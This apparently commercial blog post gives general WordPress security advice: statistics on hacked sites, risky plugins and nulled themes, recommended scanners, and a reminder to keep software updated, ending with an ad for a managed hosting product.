Guard Against WordPress Vulnerabilities With Scanners, Theme & Plugin Security Best Practices

If it seems as if WordPress websites are hacked more often than others, there’s some truth to that theory. WordPress vulnerabilities are common – the security firm Sucuri found that a significantly large portion of websites compromised during the first three months of 2016 ran on WordPress. Sucuri investigated 11,485 compromised sites, and 78% of them were supported by WordPress.

Granted, WordPress is the most popular and widely used CMS platform, explaining why its websites were hacked more often than those of, say, Joomla, which comprised 14% of the compromised sites in the Sucuri study. But because of the prevalence of WordPress – it publishes 58.3 million new posts each month – it is also the top target of hackers, meaning its many users are at risk.

Themes and Plugins: A Hotbed for WordPress Vulnerabilities

Two of the biggest locations for WordPress vulnerabilities are themes and plugins. They serve as veritable gateways for hackers who know that many users don’t think twice about the source of the theme or plugin they’re downloading, especially if the offering is free.

Earlier this year, the company Elegant Themes issued a security alert saying it found vulnerabilities in two of its themes and three plugins. The vulnerabilities would have allowed attackers to change site content and plugin settings – damaging business reputations, racking up costs to repair the sites, and potentially allowing hackers to reach other sites through spam.

But at least Elegant Themes’ users had a warning; in other cases, hackers often inflict damage long before anyone finds out. All of the WordPress sites that were analyzed by Sucuri earlier this year showed the hackers’ intrusion points were inside plugins.

For Your Information:

A quarter of the attacks analyzed by Sucuri were attributed to three plugins: RevSlider, GravityForms, and TimThumb. While TimThumb isn’t exactly a plugin on its own, it is a PHP library that is used in many, many plugins and has presented openings for hackers in the past.

Be Vigilant: There Are Trustworthy and Dubious Offerings

Themes and plugins shouldn’t be treated as afterthoughts. Many themes and plugins have thousands of lines of code, and all a hacker needs is one line to add a backdoor that will compromise a WordPress site.

There’s little reason to fear the offerings of WordPress.org. It’s a trustworthy site, and its many plugins and themes can be downloaded without worry – especially the ones with high ratings and recent updates. Not to mention, WordPress and the companies behind the themes and plugins will warn users of potential and discovered vulnerabilities, and release updates to patch them. They want the trust of users and will do almost anything to ensure the WordPress experience isn’t fraught with security missteps.

Nulled plugins and themes are another story – these are stolen copies of premium plugins and themes. Rather than pay for the originals, many users download the nulled versions. However, with these nulled plugins you often get what you didn’t pay for: a backdoor for hacking, hidden links, and spam, just to name a few unwanted bonuses.

Always Verify and Update

Before downloading, verify the origin of themes and plugins. Don’t just hit “install” – and instruct your clients to do the same. If you are not sure about which plugins and themes to install, reputable third parties audit them for security. You should also pay attention to reviews, ratings, and how often the plugin or theme is updated. If other users are having problems, or if it hasn’t been updated in years, be wary.

There are a few plugins that we do recommend to help protect against WordPress vulnerabilities. Wordfence, for example, conducts a deep server-side scan of your WordPress site source code, comparing it with an official WordPress repository of core themes and plugins. In addition, Sucuri checks for malware, website errors, the blacklisting statuses of themes and plugins, and out-of-date software.

Also, the open-source WPScan Vulnerability Database offers detailed breakdowns of the latest WordPress vulnerabilities, including plugin and theme weaknesses. This site is comprehensive, updated frequently, and is maintained by security testers and “good” hackers.

Don’t forget: It’s important to update themes and plugins regularly! This won’t guarantee your clients’ sites will be immune to hackers, but if a plugin or theme has a security vulnerability, its creator will release an update to patch it.

WordPress security has many variables and it’s hard to stay on top of it all. Vulnerabilities arise often, and stories about hacks are frequently published. Don’t let your clients be a victim highlighted in one of those stories. Download reputable themes and plugins and update them regularly. These simple steps will go a long way to ensuring the safety of your clients’ WordPress site.

Want WordPress without the hassle? Check out WordPress Without Limits, a managed WordPress solution, with one-click staging, one-click backup restoration, automatic updates, automatic backups, and free SSL.